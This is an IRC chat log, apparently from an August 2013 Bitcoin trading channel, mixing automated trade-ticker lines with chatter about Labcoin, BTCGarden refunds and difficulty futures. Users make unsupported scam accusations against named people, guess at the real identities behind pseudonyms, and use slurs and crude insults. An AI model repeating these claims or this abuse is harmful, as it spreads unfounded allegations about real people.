22:24:16 Avalon Clone Testing - YouTube Aug 12 22:24:16 lol... Aug 12 22:24:33 [HAVELOCK] [AM100] 10 @ 0.0367 = 0.367 BTC [-] Aug 12 22:24:35 03.08.2013 <.< Aug 12 22:24:44 cool proof Aug 12 22:25:01 mircea_popescu: there was speculation that over US$3.50 moving in and then out of LABCOIN signalled something more than too much estrogen in american fried chicken Aug 12 22:25:21 and I'm up too early Aug 12 22:26:10 [BTCTC] [LABCOIN] 30 @ 0.001699 = 0.051 BTC [+] Aug 12 22:26:10 dub i'm on my third portion of coffee with italian ice and cognac + scones with currants. Aug 12 22:26:10 [BTCTC] [LABCOIN] 500 @ 0.0017 = 0.85 BTC [+] Aug 12 22:26:11 [BTCTC] [LABCOIN] 600 @ 0.001706 = 1.0236 BTC [+] Aug 12 22:26:20 try it, i think it helps being up too early. Aug 12 22:26:40 ;;google italian ice Aug 12 22:26:41 Italian ice - Wikipedia, the free encyclopedia: ; Cool Treats - Menu - Italian Ice - Rita's Water Ice: ; Home of Luigi's Real Italian Ice: Aug 12 22:27:06 basically frozen fruit puree Aug 12 22:27:11 gelato? Aug 12 22:27:24 [BTCTC] [LABCOIN] 30 @ 0.001628 = 0.0488 BTC [-] Aug 12 22:27:26 [BTCTC] [LABCOIN] 3 @ 0.001627 = 0.0049 BTC [-] Aug 12 22:27:27 [BTCTC] [LABCOIN] 2 @ 0.001624 = 0.0032 BTC [-] Aug 12 22:27:28 [BTCTC] [LABCOIN] 20 @ 0.001623 = 0.0325 BTC [-] Aug 12 22:27:29 [BTCTC] [LABCOIN] 37 @ 0.001615 = 0.0598 BTC [-] Aug 12 22:27:30 [BTCTC] [LABCOIN] 300 @ 0.001614 = 0.4842 BTC [-] Aug 12 22:27:32 not quite.. Aug 12 22:28:05 [BTCTC] [LABCOIN] 250 @ 0.001611 = 0.4028 BTC [-] Aug 12 22:28:06 [BTCTC] [LABCOIN] 50 @ 0.001611 = 0.0806 BTC [-] Aug 12 22:28:45 sorta Aug 12 22:29:07 gelato has cream usually. Aug 12 22:29:29 riveting discussion chaps Aug 12 22:30:08 userioao gotta pass the torch of good living to the new bitcoin elite somehow, somewhere. Aug 12 22:30:24 *cuckoo Aug 12 22:30:26 [BTCTC] [LABCOIN] 1 @ 0.001614 BTC [+] Aug 12 22:30:57 [BTCTC] [LABCOIN] 30 @ 0.001614 = 0.0484 BTC [+] Aug 12 22:30:59 [BTCTC] [LABCOIN] 300 @ 0.001613 = 0.4839 BTC [-] Aug 12 22:31:17 [BTCTC] [LABCOIN] 200 @ 0.001613 = 0.3226 BTC [-] Aug 12 22:31:22 [BTCTC] [DMS.MINING] 15 @ 0.003579 = 0.0537 BTC [-] Aug 12 22:31:41 [BTCTC] [DMS.PURCHASE] 45 @ 0.02801 = 1.2605 BTC [-] Aug 12 22:32:15 [BTCTC] [LABCOIN] 30 @ 0.001611 = 0.0483 BTC [-] Aug 12 22:32:17 [BTCTC] [LABCOIN] 747 @ 0.00161 = 1.2027 BTC [-] Aug 12 22:32:21 [MPEX] [S.MPOE] 731 @ 0.00084725 = 0.6193 BTC [-] Aug 12 22:32:24 [MPEX] [S.MPOE] 28066 @ 0.0008446 = 23.7045 BTC [-] Aug 12 22:32:54 [BTCTC] [LABCOIN] 30 @ 0.001696 = 0.0509 BTC [+] Aug 12 22:33:26 [HAVELOCK] [XBOND] 1 @ 0.0010408 BTC [+] Aug 12 22:33:27 [HAVELOCK] [XBOND] 88 @ 0.0010409 = 0.0916 BTC [+] Aug 12 22:34:53 userioao: lol Aug 12 22:35:17 the scope on teh shelf means that PC is probably a real asic Aug 12 22:36:09 [BTCTC] [S.BBET-PT] 2 @ 0.001802 = 0.0036 BTC [-] Aug 12 22:36:11 really what kind of twat would think.,, nice idea to post a 10 sec clip of a mong staring into a pc case Aug 12 22:36:32 so btcgarden really gave back all the monies? Aug 12 22:36:34 that will assure our client we capable of shipping out 28nm Aug 12 22:36:43 yes ThickAsThieves Aug 12 22:36:54 [BTCTC] [LABCOIN] 2 @ 0.00169 = 0.0034 BTC [-] Aug 12 22:37:04 [BTCTC] [DMS.MINING] 30 @ 0.003699 = 0.111 BTC [+] Aug 12 22:37:05 [BTCTC] [DMS.MINING] 35 @ 0.003699 = 0.1295 BTC [+] Aug 12 22:37:06 [BTCTC] [DMS.MINING] 65 @ 0.0037 = 0.2405 BTC [+] Aug 12 22:37:08 even with the initial fee Aug 12 22:37:48 interesting Aug 12 22:37:50 [BTCTC] [PAJKA.BOND] 15 @ 0.01578 = 0.2367 BTC [+] Aug 12 22:37:57 userioao, you are misinformed. That was simply an engineer working on an Avalon clone. It was proof provided last month of Ken's trip out west. It has nothing to do with 28nm nor was it intended to imply anything about the eAsic deal. Aug 12 22:38:12 [BTCTC] [LABCOIN] 30 @ 0.00169 = 0.0507 BTC [-] Aug 12 22:38:14 [BTCTC] [LABCOIN] 2 @ 0.001691 = 0.0034 BTC [+] Aug 12 22:38:15 [BTCTC] [LABCOIN] 20 @ 0.001693 = 0.0339 BTC [+] Aug 12 22:38:15 ThickAsThieves indeed. Aug 12 22:38:16 [BTCTC] [LABCOIN] 50 @ 0.001697 = 0.0849 BTC [+] Aug 12 22:38:16 [BTCTC] [LABCOIN] 291 @ 0.0017 = 0.4947 BTC [+] Aug 12 22:38:17 [BTCTC] [LABCOIN] 510 @ 0.00174 = 0.8874 BTC [+] Aug 12 22:38:18 [BTCTC] [LABCOIN] 3000 @ 0.001741 = 5.223 BTC [+] Aug 12 22:38:19 [BTCTC] [LABCOIN] 1081 @ 0.001742 = 1.8831 BTC [+] Aug 12 22:38:20 [BTCTC] [LABCOIN] 12 @ 0.001743 = 0.0209 BTC [+] Aug 12 22:38:21 [BTCTC] [LABCOIN] 100 @ 0.001744 = 0.1744 BTC [+] Aug 12 22:38:21 no actm is junk Aug 12 22:38:22 [BTCTC] [LABCOIN] 62 @ 0.001748 = 0.1084 BTC [+] Aug 12 22:38:23 [BTCTC] [LABCOIN] 500 @ 0.001749 = 0.8745 BTC [+] Aug 12 22:38:24 [BTCTC] [LABCOIN] 3 @ 0.001749 = 0.0052 BTC [+] Aug 12 22:38:25 [BTCTC] [LABCOIN] 2 @ 0.001749 = 0.0035 BTC [+] Aug 12 22:38:26 [BTCTC] [LABCOIN] 6 @ 0.001749 = 0.0105 BTC [+] Aug 12 22:38:28 ok Aug 12 22:38:33 it is not in interest of btcgarden to scam Aug 12 22:38:35 [BTCTC] [LABCOIN] 36 @ 0.001749 = 0.063 BTC [+] Aug 12 22:38:43 [BTCTC] [LABCOIN] 3000 @ 0.001749 = 5.247 BTC [+] Aug 12 22:38:52 wait kleeck is ken? Aug 12 22:38:57 Basically. Aug 12 22:38:58 :) Aug 12 22:39:08 lmao Aug 12 22:39:09 ken is old school Aug 12 22:39:13 didn't you know? Aug 12 22:39:13 scam artist Aug 12 22:39:21 i cant help but reach for my tinfoil hat nonetheless Aug 12 22:39:26 I've been trying to keep it on the DL. Aug 12 22:39:27 userioao: they call it grifting Aug 12 22:39:28 you're the guy that came up with the brilliant idea of making an asicminer reobek ? Aug 12 22:39:31 bwahahaha Aug 12 22:39:37 notice how theres an onion on his belt Aug 12 22:39:38 that's the 1 Aug 12 22:39:38 like was btcgarden some elaborate scam with labcoin and AMC? Aug 12 22:39:43 like some meta scam Aug 12 22:39:45 dub))) Aug 12 22:39:48 kleeck slaughter Aug 12 22:39:52 ThickAsThieves http://trilema.com/2013/the-anatomy-of-another-scam/ Aug 12 22:39:54 labcoin is scam Aug 12 22:40:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.04162 = 0.1249 BTC [+] Aug 12 22:40:14 Sergeant Kleeck Slaughter, to you, dexX7! Aug 12 22:40:19 the scammers are evolving faster than the market Aug 12 22:40:19 :D Aug 12 22:40:31 exchanges are behind, invetsors are behind Aug 12 22:40:32 etc Aug 12 22:40:40 What if... what if the market IS the scammer! ITS SENTIENT! Aug 12 22:40:42 bitcoinforum is wild west, easy pickings Aug 12 22:40:49 [BTCTC] [TAT.ASICMINER] 12 @ 0.04188 = 0.5026 BTC [+] Aug 12 22:40:52 ThickAsThieves: it was a test run 'wait you mean all these children will give us their pocket money if we write a 500 word post'? Aug 12 22:41:00 ;;gettrust kleeck Aug 12 22:41:01 Trust relationship from user mircea_popescu to user kleeck: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=kleeck Aug 12 22:41:16 that's surprising. Aug 12 22:41:19 make yourself a wot noob. Aug 12 22:41:25 [BTCTC] [LABCOIN] 11 @ 0.001817 = 0.02 BTC [+] Aug 12 22:41:27 [BTCTC] [LABCOIN] 30 @ 0.001817 = 0.0545 BTC [+] Aug 12 22:41:28 kleeck is Ken? Aug 12 22:41:29 [BTCTC] [LABCOIN] 180 @ 0.001818 = 0.3272 BTC [+] Aug 12 22:41:31 lol, this guy. Aug 12 22:41:38 [BTCTC] [TAT.ASICMINER] 31 @ 0.04188 = 1.2983 BTC [+] Aug 12 22:41:40 ThickAsThieves so the noobies klaim Aug 12 22:41:57 and smidge is usagi? Aug 12 22:41:58 [BTCTC] [LABCOIN] 20 @ 0.001818 = 0.0364 BTC [+] Aug 12 22:42:03 now that i doubt. Aug 12 22:42:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.04188 = 0.1256 BTC [+] Aug 12 22:42:13 and TAT is Burnside?! Aug 12 22:42:14 I don't Aug 12 22:42:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.04188 = 0.2513 BTC [+] Aug 12 22:42:24 [BTCTC] [TAT.ASICMINER] 93 @ 0.04189 = 3.8958 BTC [+] Aug 12 22:42:24 has smidge been back? Aug 12 22:42:26 if I were Burnside BTCT would be better Aug 12 22:42:27 usagi has a distinctive whine. the smidge kid actually coded some website Aug 12 22:42:29 ;;seen smidge Aug 12 22:42:29 smidge was last seen in #bitcoin-assets 2 days, 22 hours, 57 minutes, and 12 seconds ago: why should i if theyre serious, i.e. not about push-ups and the like? Aug 12 22:42:31 and mircea_popescu is iCEBREAKER. Aug 12 22:42:31 tyhese two don't likely mix. Aug 12 22:42:44 he announced the end of dcx for now Aug 12 22:42:47 WOW HE is icebreaker? We should have suspected that Aug 12 22:42:52 LOL Aug 12 22:42:54 [BTCTC] [LABCOIN] 34 @ 0.001818 = 0.0618 BTC [+] Aug 12 22:43:00 dexX7 well it was pretty retarded, but at least he tried. Aug 12 22:43:02 i like people put the effort into lowercase i Aug 12 22:43:09 mircea_popescu: get the girl to read over the smidge thread with a usagi filter Aug 12 22:43:17 iCEBREAKER posing as a Romanian. LOL. Aug 12 22:43:18 why are there so many scammers in the channel today? Aug 12 22:43:23 I'm like 90% certain Aug 12 22:43:31 dub your idle suggestion is my command. well... hers, as the case may be. Aug 12 22:43:35 [BTCTC] [KENILWORTH] 5 @ 0.001779 = 0.0089 BTC [-] Aug 12 22:43:38 Scammers? In THIS channel? Aug 12 22:43:43 smidge got mad at me yesterday Aug 12 22:43:47 [HAVELOCK] [HIM] 10 @ 0.147899 = 1.479 BTC [+] Aug 12 22:43:49 [HAVELOCK] [HIM] 10 @ 0.149 = 1.49 BTC [+] Aug 12 22:43:52 [HAVELOCK] [HIM] 214 @ 0.1495 = 31.993 BTC [+] Aug 12 22:43:58 even the rampant abuse of punctuation fits Aug 12 22:44:05 Didn't someone just light smidge up on /r/bitcoinstocks? Aug 12 22:44:11 smidge is sposed to be German Aug 12 22:44:11 [BTCTC] [LABCOIN] 50 @ 0.00163 = 0.0815 BTC [-] Aug 12 22:44:12 i should have resuylts in an hour or two. Aug 12 22:44:17 Usagi is Animerican Aug 12 22:44:22 [HAVELOCK] [HIM] 2 @ 0.1495 = 0.299 BTC [+] Aug 12 22:44:25 ahahaha animerican Aug 12 22:44:32 ThickAsThieves: usagi is supposed to be japanese, and a girl Aug 12 22:44:32 :) Aug 12 22:44:44 i found interviews from him as a girl Aug 12 22:44:46 [BTCTC] [ACTIVEMINING] 15 @ 0.005899 = 0.0885 BTC [+] Aug 12 22:44:48 i think Aug 12 22:44:55 There may of been a time.. Aug 12 22:45:10 http://tsukino.ca/bmf/2012/06/03/cognitive-model-fpga-performance/ Aug 12 22:45:13 COGNITIVE: Model FPGA Performance | BMF Aug 12 22:45:15 https://si0.twimg.com/profile_images/1257766784/alex_twitter.jpg << smidge Aug 12 22:45:23 [HAVELOCK] [CFIG] 330 @ 0.15 = 49.5 BTC Aug 12 22:45:30 girl usagi interviews teen financier Aug 12 22:45:40 ThickAsThieves was it "serena" ? Aug 12 22:45:45 dexX7 o hey, he's pretty hawt. Aug 12 22:45:48 yup it was Aug 12 22:46:09 i would let smidge bum me no two ways about it Aug 12 22:46:11 i wonder if they cyber'd Aug 12 22:46:30 userioao you're female now ? Aug 12 22:46:49 Tat are you DeathFood? Aug 12 22:46:57 who is deathfood? Aug 12 22:46:59 mircea_popescu: I think you're getting confused, this is my secratary online Aug 12 22:47:05 Reading the bit on /r/bitcoinstocks Aug 12 22:47:14 mircea_popescu: FYI my payment address has changed to 1CMrg822oFM3DYhhYmwd9oEhcKB4CfaFkJ Aug 12 22:47:37 [BTCTC] [LABCOIN] 30 @ 0.001792 = 0.0538 BTC [+] Aug 12 22:47:40 hehe Aug 12 22:47:48 who was of the theory scammers evolve faster than the market ? Aug 12 22:47:51 [BTCTC] [LABCOIN] 100 @ 0.001792 = 0.1792 BTC [+] Aug 12 22:47:53 me Aug 12 22:47:55 !ticker h xbond Aug 12 22:47:57 well so pay the girl. Aug 12 22:47:57 [HAVELOCK:XBOND] 1D: 0.00103001 / 0.00104173 / 0.00104700 (39523 shares, 41.17221470 BTC), 7D: 0.00101200 / 0.00103497 / 0.00104800 (382666 shares, 396.04953796 BTC), 30D: 0.00012500 / 0.00100901 / 0.00110000 (2751488 shares, 2776.28238036 BTC) Aug 12 22:48:13 [MPEX] [S.MPOE] 1984 @ 0.0008446 = 1.6757 BTC [-] Aug 12 22:48:15 [MPEX] [S.MPOE] 3053 @ 0.00084451 = 2.5783 BTC [-] Aug 12 22:48:19 for? Aug 12 22:48:20 [MPEX] [S.MPOE] 7000 @ 0.00084383 = 5.9068 BTC [-] Aug 12 22:48:26 [MPEX] [S.MPOE] 10913 @ 0.00084352 = 9.2053 BTC [-] Aug 12 22:48:26 services rendered Aug 12 22:48:33 [BTCTC] [DMS.MINING] 8 @ 0.0037 = 0.0296 BTC [+] Aug 12 22:48:39 lol. Aug 12 22:48:48 tati lol Aug 12 22:48:51 tati means daddy in romanian. Aug 12 22:48:56 nice Aug 12 22:49:00 [BTCTC] [BASIC-MINING] 1 @ 0.32 BTC [-] Aug 12 22:49:01 [BTCTC] [BASIC-MINING] 1 @ 0.3203 BTC [+] Aug 12 22:49:02 [BTCTC] [BASIC-MINING] 4 @ 0.3205 = 1.282 BTC [+] Aug 12 22:49:03 [BTCTC] [BASIC-MINING] 3 @ 0.3206 = 0.9618 BTC [+] Aug 12 22:49:04 [BTCTC] [BASIC-MINING] 20 @ 0.3207 = 6.414 BTC [+] Aug 12 22:49:25 [BTCTC] [LABCOIN] 30 @ 0.001702 = 0.0511 BTC [-] Aug 12 22:49:26 [BTCTC] [LABCOIN] 125 @ 0.001701 = 0.2126 BTC [-] Aug 12 22:49:28 [BTCTC] [LABCOIN] 845 @ 0.0017 = 1.4365 BTC [-] Aug 12 22:49:53 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1999 = 0.5997 BTC [-] Aug 12 22:50:13 lmao so gmaxwell spent all night whining to people about how mean the girl is to him Aug 12 22:50:23 eventually they moved the thread to offtopic to shut him up Aug 12 22:50:37 bitcoin is such an aglomeration of butthurt Aug 12 22:50:41 nice little "is" in there Aug 12 22:50:51 I'm not mean, you are! Aug 12 22:51:05 i'm just accessible. Aug 12 22:51:12 is this the real girl ? Aug 12 22:51:17 [HAVELOCK] [XBOND] 525 @ 0.0010409 = 0.5465 BTC [+] Aug 12 22:51:29 [HAVELOCK] [XBOND] 525 @ 0.0010409 = 0.5465 BTC [+] Aug 12 22:51:36 Of course you piece of shit. Aug 12 22:51:39 [HAVELOCK] [XBOND] 525 @ 0.0010409 = 0.5465 BTC [+] Aug 12 22:51:43 /forcenick ThickAsThieves ThickAsSmidge Aug 12 22:51:46 [HAVELOCK] [XBOND] 525 @ 0.0010409 = 0.5465 BTC [+] Aug 12 22:51:52 [BTCTC] [DMS.MINING] 13 @ 0.003579 = 0.0465 BTC [-] Aug 12 22:51:57 omg she's SO mean Aug 12 22:52:00 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 22:52:01 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 22:52:07 [HAVELOCK] [XBOND] 1 @ 0.001041 BTC [+] Aug 12 22:52:10 [HAVELOCK] [XBOND] 1 @ 0.0010412 BTC [+] Aug 12 22:52:23 [HAVELOCK] [XBOND] 523 @ 0.0010461 = 0.5471 BTC [+] Aug 12 22:52:26 [HAVELOCK] [XBOND] 777 @ 0.0010462 = 0.8129 BTC [+] Aug 12 22:52:33 [HAVELOCK] [XBOND] 523 @ 0.0010462 = 0.5472 BTC [+] Aug 12 22:52:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.04189 BTC [+] Aug 12 22:52:47 [HAVELOCK] [XBOND] 3108 @ 0.00104629 = 3.2519 BTC [+] Aug 12 22:52:51 what's this xscam nao Aug 12 22:52:55 probably the only female in the channel Aug 12 22:53:02 [HAVELOCK] [XBOND] 1000 @ 0.001047 = 1.047 BTC [+] Aug 12 22:53:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.04189 BTC [+] Aug 12 22:53:10 [BTCTC] [ACTIVEMINING] 2 @ 0.005715 = 0.0114 BTC [-] Aug 12 22:53:10 [HAVELOCK] [XBOND] 1000 @ 0.001047 = 1.047 BTC [+] Aug 12 22:53:14 [HAVELOCK] [XBOND] 2000 @ 0.001047 = 2.094 BTC [+] Aug 12 22:53:24 people using btcgarden money to buy my xcoins Aug 12 22:53:25 [HAVELOCK] [XBOND] 400 @ 0.0010469 = 0.4188 BTC [-] Aug 12 22:53:32 [HAVELOCK] [XBOND] 4 @ 0.0010469 = 0.0042 BTC [-] Aug 12 22:53:34 [BTCTC] [ASICMINER-PT] 2 @ 4.131 = 8.262 BTC [-] Aug 12 22:53:47 [BTCTC] [ACTIVEMINING] 55 @ 0.005899 = 0.3244 BTC [+] Aug 12 22:53:49 [HAVELOCK] [XBOND] 39 @ 0.0010469 = 0.0408 BTC [-] Aug 12 22:53:58 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [-] Aug 12 22:54:07 breaking news from the bitcoin power rangers : they used the java carkey class Aug 12 22:54:12 now everyone is locked outside of their cars Aug 12 22:54:17 somebody please bring food and water ty. Aug 12 22:54:29 [HAVELOCK] [HIM] 2 @ 0.1425 = 0.285 BTC [-] Aug 12 22:54:32 [HAVELOCK] [HIM] 1 @ 0.141 BTC [-] Aug 12 22:54:33 [HAVELOCK] [HIM] 39 @ 0.14 = 5.46 BTC [-] Aug 12 22:54:36 [HAVELOCK] [HIM] 1 @ 0.14 BTC [-] Aug 12 22:54:38 [BTCTC] [LABCOIN] 5 @ 0.001768 = 0.0088 BTC [+] Aug 12 22:54:39 [BTCTC] [LABCOIN] 30 @ 0.001768 = 0.053 BTC [+] Aug 12 22:54:40 [BTCTC] [LABCOIN] 40 @ 0.001769 = 0.0708 BTC [+] Aug 12 22:54:42 [BTCTC] [LABCOIN] 6 @ 0.001772 = 0.0106 BTC [+] Aug 12 22:54:43 [BTCTC] [DMS.MINING] 13 @ 0.003579 = 0.0465 BTC [-] Aug 12 22:54:45 [BTCTC] [LABCOIN] 30 @ 0.001773 = 0.0532 BTC [+] Aug 12 22:54:51 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 22:54:57 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 22:54:58 ;;nethash Aug 12 22:54:59 422926.287673 Aug 12 22:55:02 ;;estimate Aug 12 22:55:03 Next difficulty estimate | None based on data since last change | 59081218.3445 based on data for last three days Aug 12 22:55:07 whoa. Aug 12 22:55:09 .d Aug 12 22:55:09 37392766.13647 | Next Diff in 177 blocks | Estimated Change: 36.1746% in 0d 18h 48m 58s Aug 12 22:55:10 that's the good stuff Aug 12 22:55:21 your futures must be raping everything :P Aug 12 22:55:28 that 500 mn bet sounds like moar and moar fun Aug 12 22:55:47 [BTCTC] [LABCOIN] 4000 @ 0.001773 = 7.092 BTC [+] Aug 12 22:55:47 the diffE tops off at .006 Aug 12 22:55:48 dub "main problem is that while they're both naive, usagi isn't this organized." Aug 12 22:55:49 [BTCTC] [LABCOIN] 360 @ 0.001773 = 0.6383 BTC [+] Aug 12 22:55:59 probly wont hit it Aug 12 22:56:15 usagi has a whole site too Aug 12 22:56:18 [BTCTC] [LABCOIN] 6 @ 0.001773 = 0.0106 BTC [+] Aug 12 22:56:19 dub "also smidge has some specific esl issues; usagi gives the impression of a thoroughly native grasp" Aug 12 22:56:22 http://tsukino.ca/bmf/holdings-nav/ Aug 12 22:56:25 Holdings / NAV | BMF Aug 12 22:56:37 ThickAsThieves im so sorry you missed all the usagi accouinting stuff in 2012. Aug 12 22:56:45 [BTCTC] [DMS.MINING] 9 @ 0.003579 = 0.0322 BTC [-] Aug 12 22:56:48 yeah Smidge does say some weird words Aug 12 22:56:48 [BTCTC] [LABCOIN] 23 @ 0.001773 = 0.0408 BTC [+] Aug 12 22:56:49 you should prolly ask factory or deprived if they kept copies. that shit was gold. Aug 12 22:56:49 [BTCTC] [DMS.SELLING] 9 @ 0.0251 = 0.2259 BTC [-] Aug 12 22:57:06 like, "think process" instead of "thought" Aug 12 22:57:08 [BTCTC] [DMS.PURCHASE] 9 @ 0.02801 = 0.2521 BTC [-] Aug 12 22:57:17 das think prozess Aug 12 22:57:29 yah we is from ghetto Aug 12 22:57:31 i dunno if i could deal with reading more than 2 line sof usagi text Aug 12 22:57:56 [BTCTC] [DMS.MINING] 4 @ 0.003501 = 0.014 BTC [-] Aug 12 22:57:58 [BTCTC] [BASIC-MINING] 1 @ 0.316 BTC [-] Aug 12 22:57:59 [BTCTC] [DMS.SELLING] 4 @ 0.0251 = 0.1004 BTC [-] Aug 12 22:57:59 its like furuknap was Aug 12 22:58:00 [BTCTC] [BASIC-MINING] 8 @ 0.3209 = 2.5672 BTC [+] Aug 12 22:58:01 [BTCTC] [DMS.PURCHASE] 4 @ 0.02801 = 0.112 BTC [-] Aug 12 22:58:04 just make smy eyes cross Aug 12 22:58:04 but the math was so bending. Aug 12 22:58:06 ;;calc (.006 - .0045) * 4000 Aug 12 22:58:06 6 Aug 12 22:58:14 6 btc profit ain't bad Aug 12 22:58:25 ;;calc (.006 - .0045) / .0045 Aug 12 22:58:25 0.333333333333 Aug 12 22:58:34 got more than 4000 Aug 12 22:58:40 https://bitcointalk.org/index.php?topic=271657.msg2909210#msg2909210 Aug 12 22:58:41 :P Aug 12 22:58:44 thestringpuller: u so sure there will be another diff change? Aug 12 22:58:47 [WTB] Rolex Submariner (box, papers and proof) Aug 12 22:58:48 [BTCTC] [DMS.MINING] 3 @ 0.0037 = 0.0111 BTC [+] Aug 12 22:58:58 before 22nd Aug 12 22:59:11 unlikely Aug 12 22:59:26 possible but unlikely. Aug 12 22:59:27 ThickAsThieves: why not? Aug 12 22:59:34 cuz bitcoin Aug 12 22:59:40 no really Aug 12 22:59:45 really Aug 12 22:59:46 if there is another change before 22nd tho... it will be pretty massive. Aug 12 23:00:03 why wouldn't there be a change? Aug 12 23:00:23 befor ethe 22nd? because it would take like a 40% diff change or something Aug 12 23:00:28 ;;calc 14/8 Aug 12 23:00:29 1.75 Aug 12 23:00:29 youd have to do the math Aug 12 23:00:49 ah ok Aug 12 23:01:01 jurov: ThickAsThieves bought a bunch of -E diffs at ~.0045 Aug 12 23:01:02 you need to shorten the time from 14 to 8 days .. so 75% jump Aug 12 23:01:02 soooo Aug 12 23:01:06 hhrlot there's a change going off in less than a day Aug 12 23:01:20 to get TWO changes crammed in 9 days means the blocks need to fly. Aug 12 23:01:21 [BTCTC] [DMS.SELLING] 6 @ 0.0251 = 0.1506 BTC [-] Aug 12 23:01:28 [BTCTC] [DMS.MINING] 13 @ 0.003501 = 0.0455 BTC [-] Aug 12 23:01:30 [BTCTC] [DMS.SELLING] 12 @ 0.0251 = 0.3012 BTC [-] Aug 12 23:01:33 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [-] Aug 12 23:01:34 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:01:43 .d Aug 12 23:01:43 37392766.13647 | Next Diff in 176 blocks | Estimated Change: 36.1963% in 0d 18h 40m 50s Aug 12 23:01:59 ;;calc 37392766*1.36 Aug 12 23:01:59 50854161.76 Aug 12 23:02:05 not 60m Aug 12 23:02:10 but roughly speaking 14/9 is the proportion, so like 50% Aug 12 23:02:21 [BTCTC] [LABCOIN] 16 @ 0.00176 = 0.0282 BTC [-] Aug 12 23:02:23 [BTCTC] [LABCOIN] 30 @ 0.001761 = 0.0528 BTC [+] Aug 12 23:02:25 [BTCTC] [LABCOIN] 100 @ 0.001762 = 0.1762 BTC [+] Aug 12 23:02:27 [BTCTC] [LABCOIN] 1439 @ 0.001765 = 2.5398 BTC [+] Aug 12 23:03:13 [BTCTC] [DMS.SELLING] 35 @ 0.0251 = 0.8785 BTC [-] Aug 12 23:03:14 [BTCTC] [DMS.MINING] 13 @ 0.003501 = 0.0455 BTC [-] Aug 12 23:03:22 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 23:03:33 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:03:38 thestringpuller: i know Aug 12 23:03:47 [HAVELOCK] [AM100] 20 @ 0.0387 = 0.774 BTC [+] Aug 12 23:04:07 [HAVELOCK] [AM100] 5 @ 0.0387 = 0.1935 BTC [+] Aug 12 23:04:09 i think i bought most of all of em Aug 12 23:04:10 [BTCTC] [DMS.SELLING] 30 @ 0.0251 = 0.753 BTC [-] Aug 12 23:05:27 [BTCTC] [DMS.MINING] 13 @ 0.003502 = 0.0455 BTC [+] Aug 12 23:05:29 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 23:05:31 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:05:42 [BTCTC] [BFMINES] 15 @ 0.002217 = 0.0333 BTC [+] Aug 12 23:05:47 in fact they started at 0.0049 but sold poorly... so i chickened out Aug 12 23:06:06 [HAVELOCK] [XBOND] 519 @ 0.0010417 = 0.5406 BTC [-] Aug 12 23:06:27 [BTCTC] [DMS.MINING] 13 @ 0.003502 = 0.0455 BTC [+] Aug 12 23:06:29 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 23:06:31 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:06:36 [BTCTC] [LABCOIN] 25 @ 0.001741 = 0.0435 BTC [-] Aug 12 23:07:45 [BTCTC] [LABCOIN] 3 @ 0.001742 = 0.0052 BTC [+] Aug 12 23:07:55 [MPEX] [S.MPOE] 2039 @ 0.00085017 = 1.7335 BTC [+] Aug 12 23:07:57 [MPEX] [S.MPOE] 17558 @ 0.00085084 = 14.939 BTC [+] Aug 12 23:07:59 [MPEX] [S.MPOE] 10759 @ 0.00085196 = 9.1662 BTC [+] Aug 12 23:08:09 [BTCTC] [LABCOIN] 6 @ 0.001741 = 0.0104 BTC [-] Aug 12 23:08:11 [MPEX] [S.MPOE] 89 @ 0.00085274 = 0.0759 BTC [+] Aug 12 23:08:13 [BTCTC] [LABCOIN] 24 @ 0.001741 = 0.0418 BTC [-] Aug 12 23:08:13 [BTCTC] [LABCOIN] 20 @ 0.001744 = 0.0349 BTC [+] Aug 12 23:08:14 [BTCTC] [LABCOIN] 27 @ 0.001747 = 0.0472 BTC [+] Aug 12 23:08:15 [BTCTC] [LABCOIN] 220 @ 0.001748 = 0.3846 BTC [+] Aug 12 23:08:16 [BTCTC] [LABCOIN] 8 @ 0.001757 = 0.0141 BTC [+] Aug 12 23:08:18 [BTCTC] [LABCOIN] 70 @ 0.001758 = 0.1231 BTC [+] Aug 12 23:08:19 [BTCTC] [LABCOIN] 121 @ 0.001759 = 0.2128 BTC [+] Aug 12 23:08:39 [BTCTC] [LABCOIN] 30 @ 0.001739 = 0.0522 BTC [-] Aug 12 23:08:41 [BTCTC] [LABCOIN] 3 @ 0.00174 = 0.0052 BTC [+] Aug 12 23:08:42 [BTCTC] [LABCOIN] 2 @ 0.001743 = 0.0035 BTC [+] Aug 12 23:08:43 [BTCTC] [LABCOIN] 164 @ 0.001759 = 0.2885 BTC [+] Aug 12 23:09:01 [BTCTC] [DMS.PURCHASE] 20 @ 0.02801 = 0.5602 BTC [-] Aug 12 23:09:02 so basically... the btc garden refund flew into s.mpoe ? Aug 12 23:09:02 [BTCTC] [DMS.MINING] 13 @ 0.003502 = 0.0455 BTC [+] Aug 12 23:09:04 [BTCTC] [DMS.SELLING] 13 @ 0.0251 = 0.3263 BTC [-] Aug 12 23:09:13 [BTCTC] [LABCOIN] 30 @ 0.001758 = 0.0527 BTC [-] Aug 12 23:09:14 [BTCTC] [DMS.PURCHASE] 13 @ 0.02801 = 0.3641 BTC [-] Aug 12 23:09:15 [BTCTC] [LABCOIN] 30 @ 0.001759 = 0.0528 BTC [+] Aug 12 23:09:16 [BTCTC] 